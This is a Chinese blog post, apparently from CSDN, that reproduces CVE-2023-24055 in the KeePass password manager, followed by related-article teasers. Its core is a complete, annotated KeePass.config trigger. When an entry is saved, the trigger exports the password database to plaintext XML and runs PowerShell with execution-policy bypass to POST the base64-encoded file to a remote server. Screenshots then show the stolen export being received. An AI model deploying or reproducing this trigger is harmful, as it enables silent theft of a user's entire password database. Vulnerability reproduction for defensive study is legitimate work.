CVE-2023-24055 Keepass密码管理工具漏洞复现

最新推荐文章于 2024-05-25 10:02:30 发布
最新推荐文章于 2024-05-25 10:02:30 发布
阅读量441 收藏
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45036977/article/details/128976552
版权

KeePass 是一款免费的开源密码管理器
对 KeePass 配置文件具有写入权限
KeePass.config
在这里插入图片描述
打开KeePass 配置文件KeePass.config,在TriggerSystem处写入相应的触发器代码
在这里插入图片描述

		<Triggers>
			<Trigger>
				<Guid>UVa+fd1Qr0KAcynoacKFKw==</Guid>
				<Name>Trigger</Name>
				<Events>
					<Event>
						<TypeGuid>s6j9/ngTSmqcXdW6hDqbjg==</TypeGuid>
						<Parameters>
							<Parameter>0</Parameter>
							<Parameter />
						</Parameters>
					</Event>
				</Events>
				<Conditions />
				<Actions>
					<Action>
						<TypeGuid>D5prW87VRr65NO2xP5RIIg==</TypeGuid>
						<Parameters>
							<Parameter>C:\Users\a\AppData\Local\Temp\exploit.xml</Parameter>//指定文件的导出路径
							<Parameter>KeePass XML (2.x)</Parameter>
							<Parameter />
							<Parameter />
						</Parameters>
					</Action>
					<Action>
						<TypeGuid>2uX4OwcwTBOe7y66y27kxw==</TypeGuid>
						<Parameters>
							<Parameter>PowerShell.exe</Parameter> //powershell绕过权限不加载本地配置文件,执行Invoke-WebRequest发送post请求请求体为base64编码的字节码文件
							<Parameter>-ex bypass -noprofile -c Invoke-WebRequest -uri http://server_addr/exploit.raw -Method POST -Body ([System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes('C:\Users\a\AppData\Local\Temp\exploit.xml')))</Parameter>
							<Parameter>False</Parameter>
							<Parameter>1</Parameter>
							<Parameter />
						</Parameters>
					</Action>
				</Actions>
			</Trigger>
		</Triggers>
	</TriggerSystem>

写入触发器代码后,等待管理员登录,当有新的密码条目被添加并保存时,密码就会被导出powershell执行就会触发把文件内容带出
在这里插入图片描述添加一条记录保存,直接保存就能触发应该是保存的触发器,收到请求
在这里插入图片描述导出的文件
在这里插入图片描述

Caihaowo
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
pyLoad远程代码执行漏洞复现(CVE-2023-0297)
0xSec
01-30 2864
pyLoad是一个用 Python 编写的免费和开源下载管理器,可用于NAS、下一代路由器、无头家庭服务器以及任何能够连接到互联网并支持 Python 编程语言的设备。pyLoad 存在代码注入漏洞,未经身份验证的攻击者可以通过滥用 js2py 功能执行任意 Python 代码。
[ vulhub漏洞复现篇 ] WebLogic Server 远程代码执行漏洞复现 (CVE-2023-21839)
qq_51577576的博客
03-12 1682
[ vulhub漏洞复现篇 ] WebLogic Server 远程代码执行漏洞复现 (CVE-2023-21839) WebLogic是美商Oracle的主要产品之一,系购并得来。是商业市场上主要的Java应用服务器软件之一,是世界上第一个成功商业化的J2EE应用服务器,目前已推出到14c版。而此产品也延伸出WebLogic Portal, WebLogic Integration等企业用的中间件,以及OEPE开发工具。
CVE-2023-24055漏洞复现
Fiverya的博客
02-01 2636
CVE-2023-24055漏洞复现。​ KeePass采用本地数据库的方式保存用户密码,并允许用户通过主密码对数据库加密。 网络攻击者能够利用漏洞在用户毫不知情的情况下,以纯文本形式导出用户的整个密码数据库。
KeePass敏感信息明文传输漏洞复现CVE-2023-24055
蚁景网安学院
02-20 1022
KeePass 是一款免费的开源密码管理器,可帮助您以安全的方式管理您的密码。您可以将所有密码存储在一个数据库中,该数据库由一把万能钥匙锁定。因此,您只需记住一个主密钥即可解锁整个数据库。数据库文件使用目前已知的最佳和最安全的加密算法(AES-256、ChaCha20 和 Twofish)进行加密。
CVE-2023-24055 KeePass信息明文传输漏洞复现
蚁景网安学院
02-20 805
前言由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。如果文章中的漏洞出现敏感内容产生了部分影响,请及时联系作者,望谅解。一、漏洞描述漏洞简述KeePass 是一款免费的开源密码管理器,可帮助您以安全的方式管理您的密码。您可以将所有密码存储在一个数据库中,该数据库由一把万能钥匙锁定。因此,您只需记住一个主密钥即可解锁整个数据库。数据...
复现CVE-2023-21839
Coder的博客
05-02 1861
下载jdk1.8或#创建java文件夹#解压后更改文件夹名字为 jdk1.8.0.372#将文件夹移动到/usr/local/java目录下验证是否安装成功javac如有提示,安装完成。
CVE-2023-6548 和 CVE-2023-65的Citrix Netscaler/ADC-13.0-92.21 最新补丁
01-19
针对CVE-2023-6548 和 CVE-2023-6549 的 NetScaler ADC 和 NetScaler Gateway 的漏洞补丁升级包 CVE-2023-6548 :在管理接口上执行经过身份验证的(低特权)远程代码 CVE-2023-6549:拒绝服务 2、 强烈建议受影响...
OpenSSH(CVE-2023-38408)一键升级修复-OpenSSH9.5p1
10-17
2023年,OpenSSH发现了一个名为CVE-2023-38408的安全漏洞,这个漏洞可能允许攻击者在特定条件下绕过身份验证或执行未授权的操作,对系统安全构成威胁。为了保护您的系统不受此漏洞影响,及时升级到OpenSSH 9.5p1...
Apache OFBiz RCE漏洞复现CVE-2023-51467)
0xSec
12-28 2363
该系统的身份验证机制存在缺陷,可能允许未授权用户通过绕过标准登录流程来获取后台访问权限。此外,在处理特定数据输入时,攻击者可构造恶意请求绕过身份认证,利用后台相关接口功能执行groovy代码,导致远程代码执行
探索安全漏洞CVE-2023-24055KeePass 2.5x的预防与应对策略
gitblog_00037的博客
05-25 581
探索安全漏洞CVE-2023-24055KeePass 2.5x的预防与应对策略 CVE-2023-24055_PoC项目地址:https://gitcode.com/gh_mirrors/cv/CVE-2023-24055_PoC 一、项目介绍 随着密码管理的重要性日益凸显,KeePass因其可靠性和开源性质而备受推崇。然而,最近披露的CVE-2023-24055暴露了其2.5x版本的一个...
CVE-2023-22809复现(Rot5pider安全团队)
weixin_52763014的博客
04-08 2845
复现过程中,遇到了编辑器的版本问题,vim 8.0 没办法使用那条攻击命令报错是说vim不能使用--参数,但是换了一个环境的ubuntu下的vim8.1就可以执行,具体问题不是很清楚,可以多试试。具体格式就是: xxx ALL=(ALL:ALL) sudoedit /etc/xxx 其中第一个xxx是你要进行提权的普通用户的用户名,第二是etc下的一个随意文件(这里具体哪些能行哪些不能行,我也不知道,我测试的vim和xml都可以执行,多试试)保存退出,然后 su xxx切换到用户中。
pyLoad远程代码执行漏洞(CVE-2023-0297)复现以及原理流量特征分析
xhscxj的博客
02-10 2652
pyLoad是一个用 Python 编写的免费和开源下载管理器,可用于NAS、下一代路由器、无头家庭服务器以及任何能够连接到互联网并支持 Python 编程语言的设备。pyLoad 存在代码注入漏洞,未经身份验证的攻击者可以通过滥用 js2py 功能执行任意 Python 代码。
CVE-2023-27253-pfsense命令注入漏洞复现(含exp)
zwy15288408160的博客
09-29 1715
NetGate Pfsense
CVE-2023-21839 Weblogic IIOP RCE复现
Love&Share
04-14 1665
WebLogic是美国Oracle公司出品的一个application server,用于本地和云端开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。WebLogic Server是一个基于JAVAEE架构的中间件,将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中,提供了Java Enterprise Edition (EE)和Jakarta EE的可靠、成熟和可扩展的实现。
漏洞复现-CVE-2023-33246 Apache RocketMQ RCE漏洞原理与复现
关注网络安全、云原生安全
07-15 3395
服务端管理员调用的接口没有鉴权,且将内容直接拼接到执行的命令,没有做过滤。
CVE-2023-27363 FOXIT PDF READER与EDITOR任意代码执行漏洞复现
热爱学习,喜欢折腾!
05-21 1263
福昕软件注册于国家科技部批准建立的十二个国家火炬计划软件产业基地之一的福州软件园和北京中关村高科技园区。公司专注于电子文档技术的研究和开发,拥有一套完全自有知识产权的PDF核心技术实现,提供PDF从生成、编辑、加工、搜索、显示、打印等一整套处理流程的解决方案,是国内为数不多的面向全球市场的基础软件开发商之一。
WinRAR 0day CVE-2023-38831分析复现及poc
yuanlirong22的专栏
08-27 2351
最近WinRAR 的CVE-2023-38831 漏洞被在野利用POC已可使用。漏洞影响版本:WinRa
CVE-2023-24055 漏洞分析
最新发布
07-05
CVE-2023-24055是一个安全漏洞的标识符,通常由网络安全专家分配给具有潜在威胁的应用程序、系统或服务中的错误。由于它是2023年新发现的漏洞,具体的细节可能会有所变化,但一般来说,这类漏洞可能涉及到软件的代码...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值